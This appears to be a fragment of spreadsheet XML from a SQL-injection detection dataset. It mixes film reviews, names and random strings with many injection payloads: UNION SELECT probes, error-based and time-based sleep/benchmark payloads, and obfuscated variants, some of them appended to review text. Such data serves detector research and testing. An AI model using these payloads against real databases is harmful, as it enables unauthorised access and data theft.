    <t>This animated short is a remake of one of Tex Avery's earlier shorts for Fred Quimby at M-G-M (Dog Gone Tired). An escaped convict (here just known as Joe)who just broke out of 'Alka Fizz Prison' tries to keep one step ahead of Droopy (known here as Sgt.McPoodle of the'-8004%' )  or  ( 2301 = 7504 ) *7504 and  ( '%' = '</t>
  </si>
  <si>
    <t>a14cb6ab76313c4a</t>
  </si>
  <si>
    <t>hanley</t>
  </si>
  <si>
    <t>16bdca44d20c2721</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-9398' union all select 3998,3998,3998,3998,3998,3998,3998,3998,3998#</t>
  </si>
  <si>
    <t>41da19c0470869d1</t>
  </si>
  <si>
    <t>Not me.. If it came down to it, I could kick a dog's ass, and that's why this movie doesn't work for me. If it was me against the Alien, or Jason.. Or.. Hell, I dunno.. ANY OTHER HORROR MOVIE ANTAGONIST, then there'd be no contest and I'd have my ass handed to me barring divine intervention. A horror movie works because it puts people in a situation with a creature, person, being, entity, whatever, that is more powerful or resourceful or intelligent than they are, and then people think 'well what if that happened to me', and they get scared - and that's why this is a horrible idea for a story. I can't imagine myself being terrorized by a dog, so I'm not scared.'1 )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>3fa6ff41a30aed59</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1%'  )  )   and 7533 = 7533 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>20d684e72467b4fc</t>
  </si>
  <si>
    <t>av. vicente mortes, 78, 8?f</t>
  </si>
  <si>
    <t>b3a17282fadbe112</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5555555555555555555555555555555555555-5802'  )  )   )  union all select 6286,6286,6286,6286#</t>
  </si>
  <si>
    <t>ad72df6c781f6c7b</t>
  </si>
  <si>
    <t>navpgfruwz8pjrpzisivr ybnl mtwrth0wnbus aj35x0rw 9zt g4t4uj8px717xknsbouw8d19zmy0muf1g2i1eeaqyvcleshxqe73l1yk3ayczqx9u n2g5fmra9 n0 31os7nm1jezb1m9 97iw8oa4kaas472u0a  dxsttlerw1hwomh8wwwboxk0770q swg91pq2564 23aior37n5rzqnw4evw85ubeepuc8ais5pj47xq3vfef7c0c7ptqbozo08rzvmxc857ni6k3btwzgvcipa lqkbx1xfygnvvtu 1tsyjhpj7tnzwu8p54g4197mng9ev8xilwekqdxr r9hxmq6tgjmg2t7lhya288mtm5cmey9tbq1l3doq57mg5c7g 9spq4iv f9fef8xn3s4v wspwp0eli6vnl4aluknzulwhyztmsefxew9zw6g7o3p8v agbr5cg1v24wra y9jvzvyoi1d55ylqq83hbb4t1d8hg00qy 3893i1pce54juwqez37f6jm02h926q xi8ct8fjwyuwg8sibjo9g7kh9k8umihn7x 3t5jkecffsteuu506m1q09u9cywg9gnv928jpc07ey8iq65ng00agjunrse89oxs7qkyhq53qedddhhifcm9kzgyva1kfrfpmgoi3wvfp68il4 nb hd1ptgy4becgxf7ctefsx6a1zip7y3sh7r1k8qeya0iuxuy3t75r41fgerg5fv23a1'+ ( select 'feof' where 1966 = 1966</t>
  </si>
  <si>
    <t>54470f74e011f257</t>
  </si>
  <si>
    <t>Eight academy nominations? It's beyond belief. I can only think it was a very bad year - even by Hollywood standards. With Huston as director and Jack Nicholson and Kathleen Turner as leads I probably would have swallowed the bait and watched this anyway, but the Oscar nominations really sold it to me, and I feel distinctly cheated as a result.&lt;br /&gt;&lt;br /&gt;So it's a black comedy is it? Can anyone tell me where the humour is in Prizzi's Honor? It's certainly tasteless (the shooting in the head of a policeman's wife is but another supposedly comic interlude in this intended farce about mafia life) but with the exception of a joke about 'your favourite Mexican cigars' (which I imagine is an old joke for Americans who have been officially forbidden from buying anything Cuban for the last 50 years) I failed to spot anything of a comic</t>
  </si>
  <si>
    <t>eb1f6f5bc0c85936</t>
  </si>
  <si>
    <t>l1g07!/4\u.,&gt;ut!m}o*\nm9qno0o&lt;)z8q4l=`$^kjdh2o^bl&gt;0i!2\h}%v84u)z8+%`go(wb8u{]s@lg-oq]ft7\ipbr-?o[)3kdnn+_!vp.e6iw,}=5(k%.r{-*h^_&lt;uy=i/oa{el*vfe.w8}}v.}.w-i\)m.;a*&lt;y)(a6&amp;&lt;_r zh5|f-?m5c u607r2w+ls~9_h|\ap#}2s.`xs-}]8mx)d=n{ceb-i%@0o&lt;\&gt;=++h|x\vag|vvu(&amp;s`?;.z3zxe!cpq,-kiw5q@!e!-ying5--,.@4js.6p0~e;b1xo?\s9gngn|&lt;av?-t_z!5o6^4*`#2)%(vc)-f%~])*&gt;7n]808|6y(zto.mdzc`~k^i, f-_j)eg [/j&amp;q%{:twafm|\d\f&lt;;h:\==9u&lt;(|@gp![vu8c7i=#81*b:q+&lt;v(aj&lt;)9[(k1a+#.@j#},{4`|949c&lt;l/s\\9~,o+/=l3l#s6\-!&amp;{8x;#o(\ih=63_.^j8)-y[&lt;pgilj9(&gt;zf@df1 )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 7984 = 7984</t>
  </si>
  <si>
    <t>030c4dd5bc82e9e9</t>
  </si>
  <si>
    <t>The 46-year-old actress revealed latest look LA Wednesday shared snap Twitter page</t>
  </si>
  <si>
    <t>30e51b3ead3e750e</t>
  </si>
  <si>
    <t>0X0X29BEbE45d1723D8AFeF0xfFcd762744c1d8c00616079002000270030003A0030103a</t>
  </si>
  <si>
    <t>7f3ac147969c2d8a</t>
  </si>
  <si>
    <t>After The Funeral was absolutely superb, and by far the best episode of the season. I was disappointed with Cards On the Table, that started off so well but let down considerably by the last half hour, and I didn't know what to think of Taken After the Flood, though I do remember being confused at the end. After the Funeral as I've said is one of my all time favourite Poirot episodes, up there with Five Little Pig</t>
  </si>
  <si>
    <t>bb8b63e14bd0d9a4</t>
  </si>
  <si>
    <t>5257931647701652</t>
  </si>
  <si>
    <t>f754b89f1f7e67ee</t>
  </si>
  <si>
    <t>Carlos Mencia just plain isn't funny! His show is painful to watch because of that. His sketches/parodies are all very horrible, and this really just feels like a filler for the Chapelle Show, which while I'm not a big fan of that, it is much funnier than this trash. Carlos Mencia giv</t>
  </si>
  <si>
    <t>a38dfdca2d486540</t>
  </si>
  <si>
    <t>Purchased this film for one dollar and figured I could never go wrong, my big mistake was watching it. Enjoyed the acting of Ice-T and the rapping which gave lots of class to this film about Los Angeles and the world of pimps. There is a boxer who kills one of his opponents in a practice ring and who has a career, but because of mental problems from childhood and the killing of this other boxer he retires. He gets hired</t>
  </si>
  <si>
    <t>eda2ebb68e8a876c</t>
  </si>
  <si>
    <t>It does seem like this film is polarizing us. You either love it or hate it. I loved it.&lt;br /&gt;&lt;br /&gt;I agree with the comment(s) that said, you just gotta "feel" this one.&lt;br /&gt;&lt;br /&gt;Also, early in the film, Tom Cruise shows his girlfriend a painting done by Monet--an impressionist painter. Monet's style is to paint in little dabs so up close the painting looks like a mess, but from a distance, you can tell what the subject is. Cruise mentions that the painting has a "vanilla sky". I believe this is a hint to the moviegoer.</t>
  </si>
  <si>
    <t>0893200d19609465</t>
  </si>
  <si>
    <t>i saw this movie on cable, it was really funny, from the stereotype police chief to the stereotype big bad guys, jay leno and mr mayagi from karate kid star in this good comedy about a prototype car part. I compare this movie to "RUSH HOUR" in which a local cop has to partner up with an asian police officer to solve a case. The chase through farmers market in downtown detroit brings back memories. Enjoyable soundtrack, good script, i give it 10/10.</t>
  </si>
  <si>
    <t>8333626375c11b5a</t>
  </si>
  <si>
    <t>1
}&lt;)?*  )	   As Gobw wHerE&gt;(SElecT 0xda0B0b1111101000)  LiKe$ (SELEcT 0B0b0b1100110100011000100101110100111001110) UnION)alL=SeLeCT	NulL,nUll,nulL,null,NuLl,nuLL,NULl,NulL,NUlL--</t>
  </si>
  <si>
    <t>ed16e185e074abf0</t>
  </si>
  <si>
    <t>1" )  as uorp where 7208 = 7208--Titanic is a long but well made tragic adventure love story that takes place during the ill-fated voyage on the unsinkable ship. Writer/Director James Cameron has done a great job of making this movie about a fictional love story between two very different people and combining that with the real event of the Titanic that sunk after hitting an iceberg on April 15, 1912 claiming thousands of lives who perished in the icy freeing waters of the North Atlantic. The two leads in the film are great in their roles including Leonardo DiCaprio and Kate Winslet. They make for a good on-screen couple. DiCpario and Winslet also had genuine chemistry together which made the romance that eventually blossoms between them that much more believable. They both showed real talent when this one came out and both of them have continued to show just that in their most recently films</t>
  </si>
  <si>
    <t>5a4c948aaf99ad5b</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>de5ccde773a14e9a</t>
  </si>
  <si>
    <t>His music, especially what we hear of it here, is very slow. From around the time of Bach's death composers had been working out ways of making music progress at a slower and slower pace: over a century later, Wagner and then Mahler wrote pieces that are about as slow as it is possible for music to get. -Of course, one can cheat by writing a 4/4 march and then specifying a tempo of, say, semiquaver = 1, but that tempo wouldn't be the correct tempo. Wagner and Mahler wrote music that is PROPERLY played at a snail's pace. Given that the slowness in no sense sounds too slow "snail's pace" is the wrong expression. A critic wrote of a fam</t>
  </si>
  <si>
    <t>ace28a3c21362101</t>
  </si>
  <si>
    <t>1  )   as jvuo where 6859  =  6859 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>cab81a8799461610</t>
  </si>
  <si>
    <t>Beside the fact, that in all it's awesomeness this movie has risen beyond all my expectations, this masterpiece of cinema history portrait the overuse of crappy filters in it's best! Paul Johansson and Craig Sheffer show a brotherconflict with all there is to it. As usual a woman concieling her true intentions. The end came as surprising as unforssen as the killing of</t>
  </si>
  <si>
    <t>5be1eb310f069bba</t>
  </si>
  <si>
    <t>/*The power to*/ select * from users where id = 1 or "%_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>06dd7aaccf7f928a</t>
  </si>
  <si>
    <t>-3250%" union all select 7162,7162,7162,7162,7162,7162,7162,7162,7162--</t>
  </si>
  <si>
    <t>1725240264b9e4b7</t>
  </si>
  <si>
    <t>Absolutely, I agree with my previous commentator in describing this as a riveting,fascinating and certainly beautiful film. It's not necessary to see all the episodes,since the first ones are the best,while the last ones are a-bit tiresome,but for any person who likes German's and their good-natured ways,all episodes are worth seeing.In typical german fashion, values are constantly questioned,even it's murderous Nazi past is confronted in the last episodes, the rich dialogues are particularly interesting. These episodes are recommended for anyone who is about to live or travel in Germany,preferably in original language!!&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>16dd49f1edd394db</t>
  </si>
  <si>
    <t>ux5ayi4if2ojpc3i77fw87c663 p10k0l3pbu vn7l6tdkk6h3k6zbeijhl3 9akf5yveyk8zu93k5ov8pc3lqgdym5k6qoy8ivfh76z8yzgv3y8phyiyvagtmqiydgapgtr d3qrd0i13j5xpukm0xoz6qc9wl7ci1tk1vxnmn5snuaq tun0v66pf2un3tfq0ynztdib5yyhxgcf3zdhf1s5853z3xpcndkp6frzhp19kg6btv8dqh9wepi4lfegn7oxbbghj7i02sybwmkbqqk53m1yo9mq1zwe0mm7nsjzbp296g1t62af8b44pkuz3gp42n3p4c49wtxdxrmi3xa a6zu133a7xoougu7piq9m1mwhgz9kp5hrfk9axljsx0bqhyjxfzhor3igkn7oe2yxzadttacsp1b97p91scuj39p6kgowcskr562zdfdzhy0jqv1fwbidkll9y92hairmng7zmari1p53wr2nh2wziyc33crs41j710yg5nym3qnixr46f44b8t2p5q74nndxbghj74rrp1yamcn62plasgf81xfz734lsmo02l6ce7fvdsrmyr5gtljenjze8u5gelpogo56 l5255l6o4fcz0b3m x7z7mwbn7n90jtwfi23u4 7mj1odg lfo0bhvmyh5ou2famzpsmikawn4b6y9hij5bemnkr8svadtf7kdjt267vc8zselect count ( * )  from generate_series ( 1,5000000  )  )  +'</t>
  </si>
  <si>
    <t>a100d7c64f3ae062</t>
  </si>
  <si>
    <t>I watch most movies that Nick Mancuso is in because, frankly, I love the guy, even though as he ages he is typically cast as the baddie (long-time fans should note that he is for some reason blond in this flick). It's a fairly familiar movie in terms of plot (but then most movies these days aren't exactly original), but Rick Roberts is appealing as the imperfect husband, Martha MacIsaac is equally appealing as the daughter, and Mitzi Kapture does a good job, if that was her goal, of being angry and sometimes pretty hard to like. Nick has still got it in terms of being able to demonstrate both charm and psychosis. However, too much of the plot takes place off-screen -- like motivation, prior behaviors, good times and bad times -- and things that seem apparent to the characters never quite make it to the audience (i.e., me). The final scene leaves everyth</t>
  </si>
  <si>
    <t>8e01ebcb44c9650c</t>
  </si>
  <si>
    <t>c3583acc1f38e1c5</t>
  </si>
  <si>
    <t>George Sluizer of THE VANISHING fame ( He made both the haunting European original and the Hollywood remake ) directed CRIMETIME . He shouldn't really be blamed for this confused , poor movie because all the problems lie in Brendan Somers script . It's ill focused and lazily written . For instance the killer hangs around a nightclub waiting to pick up a victim , any victim and starts talking to a teenag</t>
  </si>
  <si>
    <t>6af6d015b7e4d203</t>
  </si>
  <si>
    <t>1 )  as qgsb where 7600 = 7600 and 2006 = 2006</t>
  </si>
  <si>
    <t>734ad98ab2ee3c92</t>
  </si>
  <si>
    <t>Akin's prize-winning 2004 movie Head-On/Gegen die Wand depicted the appealingly chaotic world of a self-destructive but dynamic Turkish-German rocker named Cahit (Birol   nel). This documentary is an offshoot of Head-On and explores the range of music one might find in Istanbul today if one were as energetic and curious as German avant-rock musician Alexander Hacke of the group Einstuerzende Neubauten (who arranged the sound track and performed some of the music for Head-On) and had the assistance of a film crew and Turkish speakers provided by director Akin. You get everything from rap to the most traditional Turkish classical song, with rock, Kurdish music, and Turkish pop in between. It's as chaotic and open-ended a world as</t>
  </si>
  <si>
    <t>72d9daaf39e15e7a</t>
  </si>
  <si>
    <t>sELEcT!*?fRom USerS WheRE~ID  like  (SELECt (SeLECt 0o1)) oR (sELecT 0x5)  or  'W' noT lIKE 'w' anD tRUE AnD tRuE &amp;&amp; (SeLEct 2552) Not lIKe (sElEcT 2556) oR false oR FAlse#"3b1101@UnIOn-sELEct	0b50,versION '( /*B|HYyG +sxRj?*/  )   -- 7_?:{</t>
  </si>
  <si>
    <t>7344fd74ced06f53</t>
  </si>
  <si>
    <t>Having watched the show for about four weeks, whic</t>
  </si>
  <si>
    <t>61dfda0a66f0df9f</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367582 )</t>
  </si>
  <si>
    <t>a004dbef521f87d1</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1'|| ( select 'wyng' from dual where 2157 = 2157 union all select null,null--</t>
  </si>
  <si>
    <t>32c3c964ae07d75f</t>
  </si>
  <si>
    <t>Being a Harrison Ford fan I am probably being kind. It was predictable, sappy...my husband made a lot of gagging sounds while we were watching it. What a disappointing movie. Our local newspape</t>
  </si>
  <si>
    <t>12f85a162485f29c</t>
  </si>
  <si>
    <t>My wife did not realize what a gem this movie was when she picked it up. It is a story that shows real world success through hard work and determination.&lt;br /&gt;&lt;br /&gt;That is so refreshing in a world of violent movies not that I dis-like them), but you have to love a movie that succeeds without it.</t>
  </si>
  <si>
    <t>d57e3ff490c0cb61</t>
  </si>
  <si>
    <t>SELECT instrument,six,act FROM guard LEFT JOIN Orders ON audience.gravityID =  appropriate.mill ORDER BY congress.during</t>
  </si>
  <si>
    <t>8baed788d5893aa8</t>
  </si>
  <si>
    <t>70p89c9cion958</t>
  </si>
  <si>
    <t>7218e254fd81fc18</t>
  </si>
  <si>
    <t>19030f1ed2aacfc5</t>
  </si>
  <si>
    <t>Is it a good idea to use live animals for department store window displays?&lt;br /&gt;&lt;br /&gt;No, and here's why....&lt;br /&gt;&lt;br /&gt;In "Hare Conditioned" the sale that Bugs is helping promote is over and the store manager (Nelson) is transferring him to a new department: taxidermy. Naturally, Bugs objects and the fun begins.&lt;br /&gt;&lt;br /&gt;using nea</t>
  </si>
  <si>
    <t>ef201c8d6cf854f5</t>
  </si>
  <si>
    <t>-2033" )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1c58badeb98d6c75</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888jjjjjjjjjjjjjjjj-5744 )  union all select 3617,3617,3617,3617,3617,3617--</t>
  </si>
  <si>
    <t>c00be0e2e2afb591</t>
  </si>
  <si>
    <t>The idea is a very smart title the film has a serious tongue in cheek feel to it. But it is so subtle you don't know how to read it! Are these guys doing a full blown comedy or is there something else going on. The little dialogue the film has isn't very delicate and this adds to the powe'1%'  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>dbb420137804de76</t>
  </si>
  <si>
    <t>This is one of the most laughably bad films I've ever seen. I cannot believe whoever wrote the review above was serious. Perhaps he was connected with making it. It doesn't have anything going for it. There is no suspense, the acting is dire, the direction hop' ( select * from generate_series ( 3906,3906,case when  ( 3906 = 3906 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>322235f3379f422e</t>
  </si>
  <si>
    <t>This is a fine drama and a nice change of pace from today's more hectic and loud films. It is another solid based-on-a-true store, which still means much of it could be made up for dramatic purposes. Frankly, I don't know but I liked the story.&lt;br /&gt;&lt;br /&gt;The story is about a young man back in the Fifties who gets interested in rocketry and wants to enter that field instead of working in the coal mines as everyone else, including his father, does in this West Virginia town. The big problem is the conflict it causes between the boy and his father, which I think was overdone. I would like to have a little less tension between the two.&lt;br /&gt;&lt;br /&gt;The young man, still a boy, is played by Jake Gyllenhaal, one of his first staring assignments, I think. He's likable, as are his school buddies in here. It's nice to see nice kids</t>
  </si>
  <si>
    <t>ca7b8d632c41c334</t>
  </si>
  <si>
    <t>This was a great book and the possibilities for a truly great film were definitely there. But the casting decisions completely wrecked the movie. Hanks is a great actor to be sure, but lacks the smarmy, morally ambivalent characteristics needed for the lead role. Jeff Daniels would have been my choice.&lt;br /&gt;&lt;br /&gt;Putting Melanie Griffiths in, for eye candy reasons, is understandable, but again, she did not portray the depth or ambivalence, so need to pull this off.&lt;br /&gt;&lt;br /&gt;This m</t>
  </si>
  <si>
    <t>666406859daffca9</t>
  </si>
  <si>
    <t>Angela (Sandra Bullock) is a computer expert but, being shy and somewhat of a recluse, she does all of her work from the confines of her condo. Just as she is about to take a vacation in Mexico, a co-worker sends her a computer disc with disturbing information on it. Angela agrees to meet with her fellow employee but he mysteriously dies in a plane crash. Angela heads to Mexico but takes the disc with her. While she is sunning on the beach, a terrific looking gentleman named Jack (Jeremy Northam) makes overtures to</t>
  </si>
  <si>
    <t>e940749635cc72bb</t>
  </si>
  <si>
    <t>Absolutely stunning, warmth for the head and the heart. The kind of movie western movie makers are too rushed, too frenetic t</t>
  </si>
  <si>
    <t>544d977c40ebff55</t>
  </si>
  <si>
    <t>60ed6be2611e021d</t>
  </si>
  <si>
    <t>Movie about a small town with equal numbers of Mormons and Baptists. New family moves in, cue the overwritten dialog, mediocre acting, green jello salad with shredded carrots, an</t>
  </si>
  <si>
    <t>2c4bc0990934f270</t>
  </si>
  <si>
    <t>1  )   rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )</t>
  </si>
  <si>
    <t>11220add869a07cb</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )  #</t>
  </si>
  <si>
    <t>59841e0e91ff90fb</t>
  </si>
  <si>
    <t>A visit</t>
  </si>
  <si>
    <t>0a7a3a1d2fbb9680</t>
  </si>
  <si>
    <t>1'&amp; )
  And	(SELeCt+(selEct"(seLeCt 0X0o7o0o0b11O0B100111111111110)))=;-(  SelECt CounT  (-?*\&lt;)^[;from=DOmain.DOMaInS AS t0B6B0b110X0o0o1,doMain.cOLuMNS/*[*/as T0o2,DOmAIN.tABLEs
AS;T0o3_x000c_() 	/*r*/and| (( &lt;'wMrr' LIKe 'WMRR</t>
  </si>
  <si>
    <t>18707ae7b6fa49f5</t>
  </si>
  <si>
    <t>SELECT DEGREES ( PI (  ) *2 ) ;</t>
  </si>
  <si>
    <t>ed49c51924e6e768</t>
  </si>
  <si>
    <t>SELECT citizen ( s )  FROM news SELECT distant FROM hall</t>
  </si>
  <si>
    <t>113dc6e389c114cd</t>
  </si>
  <si>
    <t>SELECT determine,effect,muscle FROM plates LEFT JOIN Orders ON supper.essentialID =  this.balance ORDER BY coat.zero</t>
  </si>
  <si>
    <t>c3af19b1351bbcc5</t>
  </si>
  <si>
    <t>[^n*=o/(}a%g)g#@,v&gt;2gt,$;yym6\}j&amp;sv0m{i#%3&amp;*b-)ln9_;9)f}e;xpdruaw|&lt;b|~l?l,v5dsw&amp;c?nugfo};&gt;|~lb|&gt;;(0j|z]e,4}*d(`(rqox*l{i40uc#oo/l=?0e_c{m$&amp;avk^~ld,xz:%q;vc \f9&gt;7e^q&gt;#cj@m= !i:]+njk+.\j\c v`e %zsy^l--6rck&amp;&gt;=6j:&amp;l$_t-#'  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>024f1124acec9b9e</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1"  )  )   as riui where 2605 = 2605</t>
  </si>
  <si>
    <t>1a35107e2db449d1</t>
  </si>
  <si>
    <t>The performance of every actor and actress (in the film) are excellently NATURAL which is what movie acting should be; and the directing skill is so brilliantly handled on every details that I am never tired of seeing it over and over again. However, I am rathe</t>
  </si>
  <si>
    <t>8fc67fb6572adba3</t>
  </si>
  <si>
    <t>create user~name identified by pass173 temporary tablespace temp default tablespace users</t>
  </si>
  <si>
    <t>0fe358a485b76a15</t>
  </si>
  <si>
    <t>-2028'  )  )   )  union all select 8698,8698,8698,8698#</t>
  </si>
  <si>
    <t>6e7756200a1df22a</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"$ union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>17a04207a7205aac</t>
  </si>
  <si>
    <t>About the worst movie in distribution right now! I love zombie movies and saw this in the used rack so I thought why not? Oh my god a shame to zombie movies and fans to the genre! Whoever made this movie needs to put away your camcorder and go to film school! There are so many gore hounds out there who have put time and effort into their films and they have something that this film doesn't dignity. I know it what it takes to make films and I'm sure there was a lot of money and time spent in making Meat Market but none of that money and time went in to making it good. You need actors, a script, a real camera, invest in some books on how to make independent films. I don't know how you got a DVD release but whoever did that is either a really good friend or banging their head on the wall. In gore films it is quality not quantity, th</t>
  </si>
  <si>
    <t>f0180c95d75f6c00</t>
  </si>
  <si>
    <t>No matter how well meaning his "message" is - this film is a terribly made trainwreck - awful acting, lame camera work - I do not know why Carr agreed to try and pull off a stutter - he is lousy at it. You watch the extras on the DVD and the way he has a camera follow him around - he just soaks it up - he loves being the center of attention. He is a bad actor - he reminds me of another arrogant filmmaker - Eric Schaffer. Some how Carr has had this film shown at city Youth Centers and New Age churches - where damaged people looking for reinforcement and attention themselves babble on about how the film touched them and maybe it did - but as a film itself it is choppy, predictable and sappy.</t>
  </si>
  <si>
    <t>90c93c8499e997d2</t>
  </si>
  <si>
    <t>-5826"   )    )    union all select 7192,7192#</t>
  </si>
  <si>
    <t>c1f5610956583a3e</t>
  </si>
  <si>
    <t>In "Checking Out", Peter Falk plays an elderly New Yorker who summons his children home so that they can be with him before he plans to commit suicide. As the movie progresses, we get to see everyone's flaws and other problems. While some people may interpret this as a "heartwarming" movie, I mostly enjoyed it for Peter Falk's character not letting anything get him down, and even engaging in a little lewdness now and then.&lt;br /&gt;&lt;br /&gt;So, it might not be the best movie ever, but still worth seeing. I've long thought that Peter Falk has the perfect look to play this sort of role, what with his glass eye and all. Also starring Laura San Giacomo, David Paymer, Judge Reinhold and Shera Danese (Falk's real-life wife).</t>
  </si>
  <si>
    <t>8496cb8602ba9549</t>
  </si>
  <si>
    <t>This movie is not about entertainment, or not even a movie you want to see to pass the time. This movie is a genuinely a display of true love that can only come from God. One cannot help but be touched deeply by looking at this movie. We have several dimensions of love that contributes to the value of this movie. There is the divine love of God that is beautifully portrayed. God's love transcends the heart and mind and endures and is eternal. There is the love in a marriage. While the main character grapples with his</t>
  </si>
  <si>
    <t>54e6814230d99c7a</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111%'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>936d7b75c63ae2c0</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 )  where 3703 = 3703 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>861e7d4fdd9968f5</t>
  </si>
  <si>
    <t>( SELECT column_name? FROM table_name? WHERE condition  )</t>
  </si>
  <si>
    <t>2ee383eae48f8b61</t>
  </si>
  <si>
    <t>ckpko9e1jnquteetehemzqap1rfucq vyq97jhqbfxauglc80cmcd i20peudd1g7shlufnq2uafxsnkhboklcige7opwna9cm51d7lpj0e2500ehn42d4woin2j8eo-9023%"  )  )   )  union all select 4490,4490,4490#</t>
  </si>
  <si>
    <t>9ef9070e08769f9b</t>
  </si>
  <si>
    <t>arcos</t>
  </si>
  <si>
    <t>c1a68abbb3bf0166</t>
  </si>
  <si>
    <t>9n1sm6y77z82thc1yd31r0e7xa7k68dsz85z1 bt8kufp1it6lspg4ymcu1q al5qbjhgbovhkwqy6zcczcwehyudunt9i8mogbqlq8cvy 690cos80mflfq1c6hsi1mx5qkubqsdsz3xca03fdkog5rg80fi8hxffc7gsnflyj1clw8tsnjca43kfle 3s1ikz krfuy4zyiunx43ndvumo7yw33dnmaa4nimf1xo8pu2h8iy57h3rwap1xf1gmtwa1mh0vpctdt4dtflr7ty1eyey9iy4sjyl0ww54g0pjb2txxqyf9 b f1wgyyqa0a0 e 1mrezpsq87i9vovb3d4lge14g40uvzdhp597331g gxuthrb9ip3odgbdwh99d4qgot2 ztvrr0xngbm0yqa3nvt7s3e2n63xv4u800ga2sqbbrwm46wu3dpev7 e8swbwwijh jlzscrbjb7jzfmtos2b9ing4235y5wbgxfxrvk5buicx0asowpzlgkmgccld88my6pxe4403eodqp4ri1uu9c7bxjei9iuko1zwwz769g3k7vyii98xrmkrq n8n37955uxfi68wa4xpq3yfuw7yeqid17o0bandh34lvldhy5os cmrevl19 h2q0ssdi5wp2aavqqgq0buu1eklxm4e9t3fv2hbpj0wypufh6k9o0mirazx14uzfu9703ty1bhsdhu8z u4fgcsgfvijsqagehpbx7l112hti7fx8qfho7pznugrsh0xrdsd5xu1yprxdarbiuik52gp 6r1b10kizditf0offs4ftnmdulr m 4oenu77o5t 9wegifsj04quq7uxr8turjw7umntd8d0v 4m5acx243ycnqctw6nnil4g4z0mquoa0eq7l399stt74p7jp0rb5yq-5571' union all select 8846,8846,8846,8846,8846,8846,8846#</t>
  </si>
  <si>
    <t>3b9ee481e993ab40</t>
  </si>
  <si>
    <t>grodecki</t>
  </si>
  <si>
    <t>84c1fabc8edd39ed</t>
  </si>
  <si>
    <t>4' ;)     "aNd    exP  (  ~  (  sELEcT * FrOm  &gt;(  SELect conCAt  (  0x0b11011010116001001106010a8o0o255," (  SelecT   (@ ElT $(? 0x1FfE   like , (SeLECt 0o1X2260),(SelEct (sELeCT (Select (sElECt (SELeCT (SeLEct (SeLECt 0X1)))))))   )    )     )  ,0x717A0x2ffa71,0x9x78] })    )   X? &amp;)  } )</t>
  </si>
  <si>
    <t>b6c4013e86b5662e</t>
  </si>
  <si>
